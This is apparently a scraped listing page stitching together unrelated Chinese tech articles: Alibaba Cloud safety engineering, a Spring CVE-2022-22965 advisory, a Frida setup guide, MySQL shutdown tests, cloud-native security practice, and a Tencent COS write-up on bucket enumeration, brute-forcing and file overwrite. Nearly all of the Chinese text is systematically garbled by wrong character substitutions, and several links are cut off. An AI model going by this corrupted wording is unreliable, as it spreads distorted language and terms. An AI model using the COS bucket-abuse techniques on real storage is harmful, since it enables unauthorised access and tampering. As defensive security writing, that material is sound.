防患于未然是平安最高能力。首先,事先危险预防包含事先剖析零碎各个组成因素、组成因素可能面临威逼和存在脆弱性,并将剖析后果作为平安治理输出。对于威逼,须要制订相应措施防止或缩小威逼产生。对于脆弱性,须要针对性进行坚固,比方对于常常会导致系统故障的零碎变配操作,通过对立的变更平台集中管理各种变配申请,从而实现对变配操作集中管控。其次,通过最小权限准则,限度操作人操作权限,包含操作工夫限度、操作对象限度和操作范畴限度。另外,每一次的变配操作,零碎能够依据操作人、操作对象、操作类型等因素,计算操作过程中存在的危险,一旦发现过程中存在确定危险,则会间接阻断以后操作;如果是高风险,则会发动穿插确认流程;如果是低危险,则会间接放行。这种形式,既实现了对危险的实时管控,避免因为人为失误导致故障,同时又均衡了研发效率与平安生产间关系。 事中的实时观测 疾速发现是防止损失扩充的重要伎俩。首先,在零碎运行过程中,通过业务指标观测、应用程序观测、云资源观测相结合的形式,可能及时发现零碎存在的问题,一旦发现故障,依照当时制订的预案,零碎会告诉相干人员进行解决。其次,基于大数据和人工智能算法,平台会实时预测相干指标变化趋势,将故障预警工夫再次提前。 预先的疾速复原 只管事先事中制订了详尽的计划,然而还是很难防止故障产生。一旦故障产生,如何疾速进行故障复原就是首要事件。依照故障不同类型,能够应用故障复原伎俩无限流、拦挡、熔断、快恢、降级、扩容、切流、重启等。不同复原形式都须要有相应零碎反对和日常演练测试。 故障复原后,平安生产委员会还须要组织相干人员排查和剖析故障起因,制订整改计划,确定故障责任人,推动和落实整改计划,避免雷同故障再次发生。 业务系统安全工程从以上的实际过程能够看出,企业很难依附繁多伎俩解决系统故障,而须要通过系统化的伎俩,从顶层的组织设计、事先的危险剖析和策略制订、事中的继续监测和预警、日常的演练和预先的应急响应等多方面进行管制。 在传统行业中,为了保障生产经营流动可能失常运行,国家制订了一系列的措施使生产过程在符合规定的物质条件和工作秩序下进行,从而无效打消或管制危险和无害因素,缩小人身伤亡和财产损失,保障人员平安与衰弱、设施和设施免受损坏、环境免遭毁坏。在修建、石油化工、交通运输、航空航天等行业,平安生产已绝对成熟和齐备,但在互联网畛域还是空白。以下图采矿业平安生产流程为例,咱们能够看出平安生产的治理要求曾经落实到了作业的各个过程和环节。 参考传统行业中的平安生产解决方案,同时联合阿里巴巴外部的最佳实际,咱们提出了业务系统安全工程解决方案,该计划是领导业务零碎防备故障的平安指南,其指标是通过预防、监测预警、应急响应等伎俩,缩小业务系统故障,保障业务零碎稳固、可用和牢靠,防备因为业务系统故障导致的资产损失和用户影响。 业务系统安全工程框架因为业务零碎以及故障起因的复杂性,单纯的从一个或多个点登程很难解决问题。业务系统安全工程以控制论和系统论为领导,以危险管制办法为工具,造成了本人的施行框架 IPDRI,即辨认(identify)、预防(protect)、监测(detect)、复原(recover)和改良(improvement)五个环节。从事前、事中、预先进行危险的管制,造成闭环的反馈网络。 其中,辨认包含资产剖析、威逼辨认、脆弱性辨认等。预防是为了防止危险的产生而采取的肯定的预防措施。监测是监测零碎和保护措施是否在失常的运行。复原是在故障呈现时疾速的采取措施复原零碎的运行。改良是查找故障起因,制订改良计划防止雷同故障的再次发生。 业务系统安全工程规范在此背景下,阿里云联结国家信通院牵头起草了《基于云计算的数字化业务安全工程规范》,该规范是国内首部聚焦于爱护零碎继续失常运行的行业标准。规范外围指标是爱护业务零碎可能继续失常运行,防备因为业务系统故障导致资产损失和用户影响,保证系统可用、稳固和牢靠。 标准规定了企业实现业务零碎继续失常运行须要具备的各项能力,包含组织设计能力、危险剖析与辨认能力、策略与管控能力、监测与预警能力以及应急响应能力。 其中: · 组织设计能力规定企业应设立顶层平安生产委员会,下辖公司平安生产部门,用技术手段晋升危险控制能力,保障业务稳固;打造平安生产文化,确保人人器重、有持续性晋升;明确行为准则,用机制爱护人,缩小犯错,升高损失,以此疾速推动稳固治理,大幅收敛公司全局性故障和重大影响故障。 · 危险剖析与辨认模块帮忙企业通过对系统脆弱性、业务平安生产需要、零碎已产生故障剖析,寻找影响信息系统平安生产的潜在危险。 · 策略与管控模块是针对曾经剖析发现的危险制订平安生产管控策略,通过升高、预防威逼产生,提前坚固、打消脆弱性等伎俩预防危险的产生。 · 观测与预警模块是通过业务状态观测、云资源状态观测、大数据危险剖析与预警以及预警治理等能力,疾速发现危险。 · 应急响应模块规定了企业缩短故障工夫、疾速复原故障应该具备的响应和快恢能力,包含容灾演练、切流、限流、降级、重启、拦挡、扩容等能力。 总结系统安全受外部和内部双重影响,在避免企业零碎受内部影响上,信息安全目前相干实践钻研和产品建设曾经较为欠缺。以后系统故障更多起因是因为企业外部问题导致,安全工程成为升高系统故障体系化解决方案。 随着企业上云和用云深刻,阿里云混合云安全工程为企业上好云、平安用云提供了全套解决方案, 内容包含:安全工程规范培训、企业安全工程规范评测认证(联结信通院)、安全工程产品体系(运维风控等)、业务稳定性征询等产品与服务, 晋升云上业务的平安可控。 原文链接本文为阿里云原创内容,未经容许不得转载。

April 6, 2022 · 1 min · jiezi

关于安全:Spring-新版本修复远程命令执行漏洞CVE202222965墨菲安全开源工具可应急排查

破绽简述3月31日,spring 官网通报了 Spring 相干框架存在近程代码执行破绽,并在 5.3.18 和 5.2.20.RELEASE 中修复了该破绽。 破绽评级:重大 影响组件:org.springframework:spring-beans 影响版本:< 5.3.18 和 < 5.2.20.RELEASE 的Spring框架均存在该破绽,倡议用户尽快进行排查处理。 缺点剖析CVE-2010-1622中曾呈现因为参数主动绑定机制导致的问题, 此前通过黑名单的形式修复了该破绽,然而 JDK9之后引入了 Module,使得能够通过 getModule 绕过前者的黑名单限度,最初导致近程代码执行。 如何疾速排查墨菲平安提供了一系列检测工具,可能帮忙您疾速排查我的项目是否收到影响。 GitLab全量代码检测应用基于墨菲平安CLI的检测工具,疾速对您的GitLab上所有我的项目进行检测 工具地址:GitHub - murphysecurity/murphysec-gitlab-scanner应用形式:从我的项目地址拉取最新代码执行命令: python3 scan_all.py -A "your gitlab address" -T "your gitlab token" -t "your murphy token"参数阐明:-A:指定您的GitLab服务地址-T:指定您的GitLab集体拜访令牌-t:指定您的墨菲平安账户拜访令牌阐明:检测仅产生在您的本地环境中,不会上传任何代码至服务端 墨菲平安开源CLI工具应用CLI工具,在命令行检测指定目录代码的依赖平安问题 工具地址:https://github.com/murphysecu...具体应用形式可参考我的项目 README 或官网文档 阐明:检测仅产生在您的本地环境中,不会上传任何代码至服务端 墨菲平安IDE插件IDE 中即可检测代码依赖的平安问题,并通过精确的修复计划和一键修复性能,疾速解决平安问题。 应用形式: IDE插件中搜寻“murphysec”即可装置抉择“点击开始扫描”,即可检测出代码中存在哪些平安缺点组件 以上几种检测形式均可在墨菲平安平台上查看具体的检测后果,并能够查看我的项目的间接或间接依赖信息。 参考链接 https://spring.io/blog/2022/0...————————————————版权申明:本文为CSDN博主「墨菲平安」的原创文章,遵循CC 4.0 BY-SA版权协定,转载请附上原文出处链接及本申明。原文链接:https://blog.csdn.net/murphys...

April 1, 2022 · 1 min · jiezi

关于安全:Frida使用文档一安装启动运行关闭

Frida应用文档(一)装置、启动、运行、敞开操作环境win10Google nexus5xPython3.9frida==14.2.17frida-tools==9.2.4 装置FridaPC装置frida和frida-tools留神frida和python frida-tools的版本匹配,Frida与Frida-tools对应关系 pip install frida==14.2.17pip install frida-tools==9.2.4 手机装置frida-server在 官网github页面的release标签里,找到对应版本的frida-server,留神要匹配零碎和架构,比方arm和arm64就不能搞错 查看手机CPU 架构类型 PS C:\Users\Administrator> adb devicesList of devices attached00eda37121888c2c devicePS C:\Users\Administrator> adb shellbullhead:/ $ getprop ro.product.cpu.abiarm64-v8a 依据frida版本和手机CPU版本下载对应的frida-server下载实现后进行解压,取得linux原生的可执行文件,咱们将它重命名为frida-server将frida-server装置至手机 应用adb命令将其推送到手机下来 $ adb push frida-server /data/local/tmp/而后应用adb shell命令进入到手机中去,执行以下命令: $ adb shellbullhead:/ $ su bullhead:/ # whoamirootbullhead:/ # cd /data/local/tmp/bullhead:/data/local/tmp # chmod 755 /data/local/tmp/frida-serverbullhead:/data/local/tmp # ./frida-server &[1] 6669frida-server运行胜利。 运行Frida启动frida-server服务电脑新开一个shell,执行如下命令 PS C:\Users\Administrator> adb shellbullhead:/ $ subullhead:/ # cd /data/lolocal/ lost+found/bullhead:/ # cd /data/local/tmp/bullhead:/data/local/tmp # ./frida-server &[1] 8610bullhead:/data/local/tmp # ...

March 31, 2022 · 1 min · jiezi

关于安全:CDN加速防御对文件下载视频直播网站起了什么作用

tg@CDNHK小编明天来跟大家说说CDN减速和CDN进攻有什么作用?对于很多公司企业做视频、网站、文件下载的起了很大的作用,减少了流量以及减少了进攻。首先咱们来理解什么是CDN。 CDN的全称是Content Delivery Network,即内容散发网络。CDN是在现有Internet根底上减少一种新的网络架构,通过部署边缘服务器,采纳负载平衡、内容散发、调度等性能,使用户能够就近拜访获取所需内容,从而解决网站拥塞状况,进步用户拜访响应速度。 二、CDN减速原理。CDN减速技术次要就是在用户和源站服务器之间减少镜像缓存层,将用户的拜访申请疏导至镜像缓存节点,而不是间接拜访源站。 三、CDN进攻的原理。CDN 防护原理是其次要在于在相干节点中胜利地建设动静减速机制以及智能沉于等机制,这种机制可能帮忙网站流量拜访调配到每一个节点中,智能地进行流量分配机制,如果CDN 存在被ddos攻打的状况。CDN 整个零碎就可能将被攻打的流量扩散开,节俭了站点服务器的压力以及节点 四、为什么当初的企业和公司利用宽泛用到CDN减速作用:次要有以下5点因素 (1)通过节俭骨干网带宽,缩小带宽需求量;(2)提供服务器端减速,解决服务器过载问题;(3)为了实现跨运营商、跨地区的全网笼罩;(4)能够克服网站散布不平衡的问题,升高网站本身建设;(5)保障你的网站平安,防止网站受到歹意攻打。

March 30, 2022 · 1 min · jiezi

关于安全:技术分享-聊聊-MySQL-关机的故事

作者:莫善 某互联网公司高级 DBA。 本文起源:原创投稿 *爱可生开源社区出品,原创内容未经受权不得随便应用,转载请分割小编并注明起源。 背景这两天看到一个 MySQL 群里在探讨一个乏味的话题,大家平时都是怎么敞开 MySQL 的,一个大佬还发动了一个投票。投票如下: 你是如何敞开 MySQL 数据库的? A、mysqladmin shutdownB、service mysqld stop(systemctl)C、kill mysqld_pidD、kill -9 mysqld_pid投票后果如下(数据起源 InsideMySQL 公众号): 选项人数占比A14133.9%B24358.4%C153.6%D174.1%生产环境中根本都是多实例部署,所以用A的形式敞开比拟多,偶然也会贪不便间接采纳C的敞开形式,如果是单机单实例,用B也没故障,然而为什么会有人选D选项呢,发动投票的大佬逐个问过后得悉,都是因为过后 MySQL 曾经不可用了,无可奈何才采纳暴力敞开。 最初,大佬最终颁布答案说,生产环境有且只有一种正确的敞开 MySQL 的形式,那就是D形式,所以在大佬看来,简直团灭。 对这个颁布后果我是持狐疑态度的,所以我带着狐疑做了上面的测试。 仅对5.7的半同步场景做了测试,对于异步场景感觉没什么意义,所以没测。一、环境介绍环境架构采纳 MySQL 5.7 加强半同步,搭建的一主一从,信息如下: 角色ip端口版本master192.168.168.1166665.7.26slave192.168.168.1266665.7.261、主库配置mysql> show variables like 'rpl%';+-------------------------------------------+------------+| Variable_name | Value |+-------------------------------------------+------------+| rpl_semi_sync_master_enabled | ON || rpl_semi_sync_master_timeout | 1000000 || rpl_semi_sync_master_trace_level | 32 || rpl_semi_sync_master_wait_for_slave_count | 1 || rpl_semi_sync_master_wait_no_slave | ON || rpl_semi_sync_master_wait_point | AFTER_SYNC || rpl_semi_sync_slave_enabled | OFF || rpl_semi_sync_slave_trace_level | 32 || rpl_stop_slave_timeout | 31536000 |+-------------------------------------------+------------+9 rows in set (0.00 sec)mysql> rpl_semi_sync_master_timeout = 1000000 是为了防止半同步降级为异步。2、从库配置mysql> show variables like 'rpl%';+-------------------------------------------+------------+| Variable_name | Value |+-------------------------------------------+------------+| rpl_semi_sync_master_enabled | OFF || rpl_semi_sync_master_timeout | 1000000 || rpl_semi_sync_master_trace_level | 32 || rpl_semi_sync_master_wait_for_slave_count | 1 || rpl_semi_sync_master_wait_no_slave | ON || rpl_semi_sync_master_wait_point | AFTER_SYNC || rpl_semi_sync_slave_enabled | ON || rpl_semi_sync_slave_trace_level | 32 || rpl_stop_slave_timeout | 31536000 |+-------------------------------------------+------------+9 rows in set (0.00 sec)mysql> 二、测试演示测试筹备登录主库筹备测试数据 ...

March 29, 2022 · 4 min · jiezi

关于安全:融云互联网通信安全揭秘之链路安全

以即时通讯和实时音视频为外围的互联网通信技术深刻倒退,使得人与人之间的交换冲破了空间、工夫等限度,让信息无远弗届,让连贯随时产生,让沟通丰盛多元。关注【融云寰球互联网通信云】理解更多 但互联网为咱们的生存带来极大便当的同时,用户隐衷和通信安全问题也随之而来。 对于开发者来说,互联网的开放性也意味着风险性;用户应用网络和终端设备的高自由度,也为不法之徒提供了可乘之机。 因而,晋升互联网通信的安全性须要贯通零碎构建的始终。本系列文章次要围绕互联网通信的安全性进行探讨,首篇聚焦“链路平安”。 互联网通信零碎的平安问题及次要攻打伎俩窃取内容如果在整个互联网通信过程中,其通信内容是未加密或弱加密的,那么其信息被截获后就能够间接被读取进去。 这会导致个人隐私泄露,甚至可能危害用户的财产平安。如果在办公场景下,被窃取的可能是公司商业秘密,那将会造成更大的经济损失。 篡改内容如果通信内容被截获后,对其进行批改再发送,会毁坏信息的正确性和完整性。 伪造内容如果用户通信凭证被窃取或在通信过程中交叉其余信息,就可能为冒用用户身份骗取与之通信者的信赖发明可能,埋下隐患。 流传不法内容基于即时通信零碎的音讯推送能力,不法分子除了可能流传涉黄、涉赌、暴恐或危害国家平安的信息外,还可能流传计算机木马病毒等。 罕用攻打伎俩移植木马通过在终端移植木马,截获或篡改信息。 伪造利用通过伪造 APP 或在 APP 中增加后门等形式,使终端用户误以为是失常利用进行应用,从而达到其不法目标。 网络抓包通过在网络设备上进行抓包,获取用户通信内容。 中间人攻打通过劫持 DNS 等伎俩,使用户通信连贯通过攻击者的设施,从而达到窃取、篡改等目标。 破绽开掘服务端或终端除了自有的程序以外还蕴含了各种三方组件或中间件,通过开掘其上的破绽,达到不法目标。 (罕用攻打伎俩) 从上图可知,信息从利用通过网络达到服务端,这期间任何一个环节都可能被人利用。所以,在“危机四伏”的互联网中,构建通信零碎须要将“平安”视为第一准则,通过多种手段保障通信安全。 密码学在互联网通信零碎连贯上的利用针对以上的平安问题和攻打伎俩,将密码学利用在互联网通信零碎连贯上,对通信数据进行加密就变得尤为重要。 密码学解决信息安全的三要素(CIA)即: 机密性(Confidentiality)保障信息不泄露给未经受权的用户。完整性(Integrity)保障信息从实在的发信者传送到实在的收信者手中,传送过程中没有被非法用户增加、删除、替换等。 可用性(Availability)保障受权用户能对数据进行及时牢靠的拜访。 除 CIA 外,还有一些属性也是要求达到的,如可控性(Controllability)和不可否认性(Non-Repudiation)。 作为互联网通信的要害组成,即时通信零碎为了实现音讯的疾速送达个别须要客户端与服务器端建设一条长连贯,用以疾速地将音讯送达到客户端。 常见的 C/S 模式下客户端会以 TCP 或 UDP 的形式与服务器建设连贯,同时某些场景下也会应用 HTTP 的形式从服务器获取或提交一些信息。 整个过程中所有的数据都须要进行加密解决,简略的数据加密能够演绎为:发送方输出明文,加密,生成密文,传输密文,接管方解密,失去明文。 其中会波及对称加密算法、非对称加密算法、信息摘要算法。我国也提出了一套自有的明码算法——国密算法。 国密算法,即国家商用明码算法,是由国家明码管理局认定和颁布的明码算法规范及其利用标准,其中局部明码算法曾经成为国际标准。如 SM 商用系列明码:对称加密算法 SM4、非对称加密算法 SM2、信息摘要算法 SM3。 连贯会话加密对于链路层面的加密,应最先思考的是基于 SSL/TLS 协定进行链路加密,这是古代互联网通信安全的基石。 很多人认为 SSL/TLS 协定是附加在 HTTP 协定上的,是 HTTPS 的一部分。其实这种了解不完全正确,SSL/TLS 是独立于应用层协定,高层协定能够通明地散布在 SSL/TLS 协定下面。因而基于即时通信的长连贯的音讯通信协定也能够构建在 SSL/TLS 协定下面。(SSL/TLS 是独立于应用层协定) SSL/TLS 能够被简略地归结为:利用基于公私钥体系的非对称加密算法,传输对称加解密算法的密钥,并将后续通信的数据包基于单方雷同的对称加解密算法和密钥进行加密并传输,从而达到保障数据安全通信 的目标。 非对称加密算法外面的公钥和私钥在数学上是相干的,这样能力用一个加密,用另一个解密。不过,尽 管是相干的,但以现有的数学算法,又没有方法从一个密钥,算出另一个密钥。 另外须要着重强调的是,在零碎中不要应用自签证书,而要应用具备 CA 认证的证书,这样能够无效的避免中间人攻打。 ...

March 22, 2022 · 1 min · jiezi

关于安全:信通院推出数字化赋能者新标准-天翼云获评数字化转型赋能服务集体

3月31日,在2021数字化转型倒退高峰论坛上,中国信通院公布了可信数字化评估体系。中国电信凭借多年数字化转型成绩获选数字化转型赋能服务个体、数字化转型推动优良个体以及数字化转型倒退先锋人物等奖项,并取得首批数字基础设施一体化云平台服务能力的认证。 在大会现场,由工信部、国资委领导,中国信通院牵头发动的企业数字化倒退共建共享平台也发表成立。中国电信天翼云、招商局、五矿、浦发银行、华为、腾讯、阿里等多家企业成为首批成员单位。2021年是“十四五”布局的开局之年。产业数字化转型被频繁提及,成为推动新旧动能转换、放慢产业转型降级的共识和致力方向。在过来一年里,随着新基建被写入政府工作报告,中国电信基于“云改数转”策略,为各行业提供了丰盛的翻新服务与利用,减速社会生产数字化、网络化、智能化,助推产业数字化转型。中国电信云计算分公司总经理胡志强在论坛现场发表了题为“云网数智安一体 赋能产业数字化改革”的演讲。他示意,在中国电信数字化转型的框架中,中国电信充分发挥包含5G、云网基础设施在内的根底资源优势。在此基础上,天翼云要持续夯实数字化的根底,构建数字化平台,整合数字化能力对外赋能。胡志强指出,中国电信会先推动外部数字化转型,构建包含自研、产品、生态、服务等能力的体系,并向外输入,实现千行百业客户的数字化转型。 目前,基于中国电信自主研发的云平台,中国电信曾经实现了云网络、云边协同、云端交融、云智能、云平安五大方面的全面云化。近几年,天翼云聚焦智慧城市、数字政府、工业制作、物流、金融、教育、交通等行业,并专门成立了行业事业部,面向各行各业的数字化转型提供全方位的服务和撑持,帮忙更多行业实现数字化转型降级。以后,数字经济曾经成为寰球大变局下可继续倒退的新动能。“十四五”布局已明确指出,要倒退数字经济,推动数字产业化和产业数字化。将来,5G、云、AI、大数据等新型信息基础设施的建设,将放慢企业数字化转型,成为推动企业业务翻新增长、实现中国数字经济蓬勃发展的松软力量。

March 21, 2022 · 1 min · jiezi

关于安全:新品发布|备案变更不用再担心中断服务啦

简介:ICP备案迁徙服务,就是面向有打算变更域名备案主体,或者在不同主体间迁徙网站备案信息的客户,实现迁徙过程中域名或者网站服务不中断的备案增值服务。 说起ICP备案,做过互联网经营业务的敌人都很相熟,只有您的网站等互联网信息服务解析到的服务器是在中国边疆(大陆),按照法律规定就必须要进行工信部ICP备案。 然而,备案才只是第一步。近两年,备案团队就遇到过很多公司有变更备案主体的辣手问题。 比方业务变动,公司要跨省了,或者换负责人了之类的,导致之前备案过的域名或网站业务须要切换到其余备案主体来治理及经营; 比方换公司主体了,备案主体无相干资质导致业务存在合规危险,须要将业务转移到有资质主体进行经营; 再比方公司业务疾速倒退,要合并或者收买其余公司,就须要将新增线上业务进行整合,新增的域名或者网站等信息需转移到总公司。 等等相似状况。 变更主体就要从新备案,不然就是不合规经营,可能被中断服务。 那这种变更ICP备案主体的状况该怎么办呢?之前的备案主体变更,须要先登记,管局通过后再从新备案,期间域名是未备案的状态,网站服务是要中断的。 好家伙,好不容易经营的网站和生意,变更主体备案要中断服务,对于公司来说,损失的不止是人力物力财力,对于用心经营的用户体验来说也是微小的挫伤。 面对太多这种辣手的状况,为了让大家少走一些弯路,缩小麻烦和损失,咱们一直评估和打造计划,终于新增了一项新的备案服务——ICP备案迁徙服务 顾名思义,ICP备案迁徙服务,就是面向有打算变更域名备案主体,或者在不同主体间迁徙网站备案信息的客户,实现迁徙过程中域名或者网站服务不中断的备案增值服务。 有了这项新的备案服务,就能既合乎监管合规要求,还能在变更过程中不中断阿里云提供的服务,不必打乱失常经营节奏,也不必影响用户体验和失常收益。 那ICP备案迁徙服务有什么长处呢?1、专家一对一服务 基于大量客户的服务教训,联合客户对于合规及一直网需要打造的迁徙计划事后评估迁徙所需的所有资料,疾速实现迁徙计划制订,让迁徙更简略; 2、服务不中断保障 自动检测备案迁徙进度,异样反馈及时预警,做到迁徙过程中线上服务的稳定性迁徙操作,保障服务不中断; 3、合规保障 针对指标主体的业务范围进行评估,通过对原有线上服务内容的业余评估,在迁徙前进行内容的合规调整,保障迁徙后的服务合规; 服务流程麻烦吗?ICP备案迁徙服务流程如下图所示,专家1对1服务领导,让简单的变更流程清晰可控,缩小额外资损。 这么不便的服务,是怎么免费呢?ICP备案迁徙服务单次购买后仅针对购买主体的单次需要失效(单次需要能够是多个网站或者多个域名)。 如果您有多个主体下的域名或者网站的迁徙需要,须要您以主体维度别离购买服务。 多种规格,可匹配具体场景进行抉择: 目前这款针对变更主题打造的ICP备案迁徙服务曾经正式上线,您能够在阿里云官网中搜寻“ICP备案迁徙“就能找到,让您在备案变更中不再放心中断服务。 原文链接本文为阿里云原创内容,未经容许不得转载。

March 17, 2022 · 1 min · jiezi

关于安全:云原生安全实践

文章首发于:前线Zone云平安社区 作者:Clare Clare是平安架构师,专一于信息安全攻防钻研和深度测试,明天分享的主题是“云原生平安实际”。 我讲的议题是,云原生平安实际,次要从两个方面来介绍云原生平安。 第一个是云原生平安面临的危险第二个是云原生平安实际 云原生的定义:它是一种构建和运行应用程序的古代办法,它次要代表的是容器,微服务,继续集成交付和devops为代表的一个技术体系。 它给开发迭代带来了新的反动,进步了研发交付的效率和进步了高可用性。然而,云原生继承了传统网络安全简直所有的危险,传统的平安模型次要关注基于边界的平安(perimeter-based security),不足以爱护云原生架构的平安。所以绝对于传统平安,云原生平安依然是真正的挑战。 云原生平安,它是一种爱护云原生平台及基础设施和整个应用程序平安实际,包含自动化数据分析,威逼检测,确保利用整个安全性及纵深进攻。 方才提到了云原生平安面临的危险,像Kubernetes一些破绽,还有一些常见的像k8s上用的组件破绽,包含其余的外部组件的高危破绽等都威逼整个云原生平台的安全性。 在图上看到很多破绽,危险是比拟高的,呈现的频率也比拟多。包含之前讲到一些容器逃逸等等这些在容器外面都遇到的十分多。 云原生平安面临的危险,次要是不足对威逼攻打的这种感知能力。在很多的企业外面,他们对这种异样流量的监测,不足实时的感知能力。还有一些利用平安自身存在的破绽,也会导致云原生面临的破绽。 一些中间件、操作系统、内部的破绽,还有比方人文因素,谬误配置导致或者权限设置生效导致的被黑客入侵等等。再比方API不足无效的鉴权,短少无效的利用平安防护,微服务等会影响到整个云平台的一些平安。 其实给咱们带来便当的同时,也带来了很多的平安需要和挑战。 云平安危险的起源包含利用多样化、网络攻击环境等等,都在对应用服务、集群容器、代码层面的平安造成很大的危险。 另外,咱们从攻击者的角度来对待云原生平安。一些容器相干的组件历史破绽,还有外部没有受到严格爱护的一些API,都会导致像比如说Kubernetes的平台等等被入侵,或者是利用他这些服务,入侵到容器外部或是管制整个集群等。 再比方不平安的容器镜像,不可信的镜像,它自身会导致被入侵。有些容器自身带有歹意脚本,黑客利用容器进行“挖矿”,而且云原生过程中API没有受到严格的爱护,也是一个很大的平安问题。平台的平安管控,和其余相关联的安全隐患,都会对云平台导致很大的危险。 接下来第二个,就是云原生平安实际,次要讲述在云原生整个过程中,如何应答遇到的危险。 云原生的生命周期,它包含运行时的平安,散发构件部署等整个平安防护。 整个云原生平台,整个依赖于根底平台的平安,计算平台的平安,容器,利用微服务方面的平安,任何一个环节的问题,都会导致N起事变的产生,所以都要从多个方面对威逼进行评估和提前主动防御。 Kubernetes的服务平安加固,列举了一些简略的办法。Kubernetes版本很多破绽就不必具体介绍了,从未知起源下载镜像,在平台上运行,还有Kubernetes基于角色的访问控制,都会晋升安全性。 API治理端口访问控制,就不须要调配或足够的鉴权,访问控制资源,还是有一些软件配置自定义参数上来晋升整个平安,容器不应该以root用户运行,然而很多企业的平安实际中,还是有很多用户以root权限运行的,包含API Server认证受权,齐全以身份认证受权来管制。 很多时候在排查故障,发现有些日志基本没有记录,对排查故障也存在一个很大的问题。所以就须要记录所有有价值的日志,最好在一个独立的日志核心存储、查看或剖析。 另外次要提到一个隔离Kubernetes节点,如果是本人独自部署的话,可能独自调配独立的网络,增强一些ACL的管制,避免被攻击者入侵。 容器平安,对于容器平安方面的比拟有价值的一些工具,包含扫描容器安全性,比如说它是重大或者高危等等,都会给咱们提供一些参考。 另外一个是Kubernetes集群中的安全漏洞,这个是针对于K8S集群进行一些浸透测试,而后会发现整个集群存在哪些重大的问题。对这些问题,可能须要人工进一步的确认,判断哪些可能有重大的隐患,再进行修复。这里提到的一些办法次要以开源的工具为主。 还有这个Falco,这是平安运行的安全监控,监控它的容器运行的可疑行为,执行了哪些可疑的操作。发送警报,集中剖析这样一个工具,而后它会进行一系列的告警,喷制等等,这个也是通过试验,是挺好用的一个工具。 它能够部署在本地机器上、云上或者Kubernetes的集群中,它会很直观的看到以后容器的很多安全事件,平安危险的排行。 开源走进平安检测其实是洞态IAST进行针对研发测试过程中的全自动平安测试,我用了大略一段时间,起初再正式测试环境进行利用,成果感觉不错。 因为它能够从测试阶段全自动化的剖析到采纳了哪些平安组件,哪些组件平安是属于高危?而且它不影响研发人员测试效率,齐全不必人工太过干涉,全自动的,在察觉破绽中施展了微小的作用。 而后咱们采纳一些关键字的检索,很快就晓得哪些项目援用了这些不平安组件和存在这样的高危危险,而后疾速去验证,去修复,节约了不少工夫。大家能够深刻理解一下。 其实在整个运行过程中,真的晋升了破绽检测效率,对测试流程毫无影响。当应急响应的时候,咱们另一方面采纳对版本库里的很多去解包、检索,还有就是过后想到咱们在应用洞态IAST检索会更快,第一工夫采纳洞态IAST的后果,筛查应用这些可被利用的组件的我的项目进行修复缓解处理,而后再排查其余的一些遗留我的项目,极大的比以前排查组件破绽晋升了应急响应效率。 API的平安防护和web利用防护的这些系列的缺失,其实在很多的企业当中,对API的平安不是很器重,还有一些利用防护很多有waf,然而它配置的基于规定库的规定防护模式不是很智能,容易被绕过。 还有API网关,要可能感知到每个API流量申请,异样剖析等等。RASP运行时爱护这些,传统WAF只针对入口的应用层攻打进行防护,采纳针对云原生的waf,APP平安网关,浸透测试,对于利用平安都是一个无效的补充。 在线测试中,咱们要重点关注一下哪些APP和API的高危破绽。很多云原生环境应用了针对一些虚拟化的基于容器化的这种防火墙的防护,能够防护多个集群,不同节点对立下发策略等等。最外围的是规定和危险感知,对于API进行全生命周期做到更深度的防护都是十分有必要的,它可能剖析API的整个调用链路追踪等等。 另外一个就是DevSecOps,它在云原生中也是很须要增强的,包含容器平安、利用剖析、动态的检测和sca等,还有软件成分剖析等,像洞态iast交互式平安检测其实都是进一步晋升利用平安爱护的办法。DevSecOps和API平安的重要性都会随着云原生的应用进一步地晋升。 包含很多平安审计在云原生平台,咱们肯定要增强每一个安全事件的治理。 要确保满足可审计哪些行为,执行了哪些命令,容器外部是否有偏离失常的行为等等。其实最次要做到可感知,这个在于云原生平台可感知能力,如果没有相应的伎俩防护,很多安全隐患是不可能及时无效的被发现。 最初总结一下,平安是一个整体。 在平安防护过程中,可能会产生一些老本方面的思考,任何环节单薄性才决定整体的安全级别。须要谨慎对危险进行研判作出决策。 咱们应该从全局登程,把危险列举进去,咱们重点去针对重大问题进行主动性的防护修复,获得主动权来应答黑客的一些攻打。而后对各种攻打,做到实时感知,做到具体可视化以及被动策略防护。 对于破绽治理,有些软件的一些破绽,咱们都要及时关注或者建设一个清单,而后重点关注这些软件的布告,平安布告破绽、平安厂商的破绽等等。 企业外部也要建设这种机制,增强破绽治理,从各个渠道获取破绽信息,POC,而后及时跟进和进行评估验证修复,结合实际需要制订平安基线,还有就是一些自动化的第三方厂商的工具来进行评估整个的安全漏洞等。

March 16, 2022 · 1 min · jiezi

关于安全:腾讯云COS对象存储攻防

文章首发于:前线Zone社区 01 Bucket 公开拜访 腾讯云存储桶的拜访权限默认为公有读写权限,且存储桶名称会带上一串工夫戳: 账户中的拜访策略包含用户组策略、用户策略、存储桶访问控制列表(ACL)和存储桶策略(Policy)等不同的策略类型。 当腾讯云 COS 收到申请时,首先会确认请求者身份,并验证请求者是否领有相干权限。验证的过程包含检查用户策略、存储桶拜访策略和基于资源的访问控制列表,对申请进行鉴权。 --摘自腾讯云官网文档 上图咱们仅配置了存储桶拜访权限,于是因为设置了公有读写,无权拜访该文件,Message 为 “Access Denied.” 02 Bucket Object 遍历 如果策略中容许了Object的List操作,则在指标资源范畴下,会将所有的Bucket Object显示进去,这时,Key值能够了解为文件的目录,通过拼接可获取对应的文件: 乏味的是,在腾讯云的拜访策略体系中,如果存储桶拜访权限为公有读写,且 Policy 权限为匿名拜访,那么 Policy 权限的优先级高于存储桶拜访权限。 如果控制台配置了Policy权限,默认是对所有用户失效,并且容许所有操作,这时即便存储桶拜访权限配置为公有读写,匿名用户也可通过遍历Bucket Object,获取对应的文件。 03 Bucket 爆破 当拜访的存储桶不存在时,Message 为 “NoSuchBucket”,通过响应包返回内容的比照,能够筛选出已存在的存储桶域名。 04 Bucket 接管 因为Bucket 接管是因为管理人员未删除指向该服务的DNS记录,攻击者创立同名Bucket进而让受益域名解析所造成的,关键在于攻击者是否可创立同名Bucket,腾讯云有特定的存储桶命名格局,即-+http://cos.ap-nanjing.myqclou...: 而appid是在控制台用工夫戳随机生成的,因而无奈创立同名Bucket,故不存在Bucket 接管问题: 05 任意文件上传与笼罩 因为Bucket不反对反复命名,所以当匿名用户领有写入权限时,可通过任意文件上传对原有文件进行笼罩,通过PUT申请可上传和笼罩任意文件。 06 用户身份凭证(签名)泄露 通过 RESTful API 对对象存储(Cloud Object Storage,COS)能够发动 HTTP 匿名申请或 HTTP 签名申请。匿名申请个别用于须要公开拜访的场景,例如托管动态网站;此外,绝大部分场景都须要通过签名申请实现。 